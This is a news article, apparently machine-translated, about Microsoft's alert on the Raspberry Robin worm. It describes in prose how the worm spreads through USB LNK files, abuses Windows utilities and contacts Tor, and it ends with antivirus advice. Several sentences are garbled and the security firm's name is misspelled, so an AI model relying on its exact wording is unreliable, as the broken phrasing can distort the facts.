A malware called “Raspberry Robin” has infected hundreds of Windows networks across multiple sectors, according to a private threat intelligence advisory from Microsoft.
Although ransomware attacks often grab the headlines, the risks posed by malware can be just as malicious and are another reason to make sure you are using Antivirus software.
The threat group responsible for the malware is currently unknown, as well as its motivation and ultimate goal.
The raspberry robin worm infects the networks
Microsoft has issued a special threat intelligence alert, informing organizations that a worm called Rasberry Robin has reportedly infected “hundreds of Windows networks” ComputerAnd the
Raspberry Robin spreads through external removable USB devices. In other words, in order to infect a device, the user has to plug the USB into it and click on the malicious file inside.
The Windows Command Prompt is exploited, malicious code is executed on the specified machine – after which it connects to the Command and Control server and downloads more malicious files.
The most legitimate Windows programs – including utilities like “fodhelper”, “msiexec” and “odbcconf” – are used to execute this code and then the worm will attempt to connect to the Tor network.
Raspberry Robin: A Modern Brief History
The worm dubbed “Rasberry Robin” was first discovered in September 2021 by intelligence analysts at Red Canary, although most activity attributed to the worm has been occurring since January 2022. Security researchers have observed this mostly in technology and manufacturing networks.
Cybersecurity firm Sekoia — which it calls the “QNAP worm” — was so worm tracking In November last year.
Sequoia said it uses “compromised QNAP devices as command and control servers” and notes that it is active on several French networks. However, for the portion of malware that is investigated by a number of security teams, it remains relatively obscure.
“This worm uses LNK files that take removable device tokens to spread (eg. network shares and USB devices). These LNK files use well-known techniques to download and execute an MSI package containing a malicious library from a compromised device” – Sekoia Security Team.
As mentioned earlier, Microsoft has noticed that it connects to addresses on the Tor network, but has not really exploited access to the networks it has compromised, despite showing its strength and showing that it can use utilities within the Windows operating system.
What’s more, Sekoia noted in their malware report that “its main code is very complex and the infrastructure used is large,” which raises more questions than answers about the nature of the threat itself.
On the other hand, Microsoft says it has found malicious tools related to the worm that was created since 2019.
Protect yourself from malware
Although such threats seem powerful, vast, and downright intimidating, there are some things companies and individuals can do to protect themselves and reduce the attack surface of a corporate or home network.
The first is to keep employees – and yourself, for that matter – up to date with the latest threats and mandatory internet and data security training.
Second, install a reputable Antivirus software on your company network. Antivirus software is designed to detect and remove malware, viruses, and other malicious files from computers and networks. All in all, it’s the best defense against this kind of thing.
#Microsoft #announces #hundreds #Windows #networks #infected #malicious #virus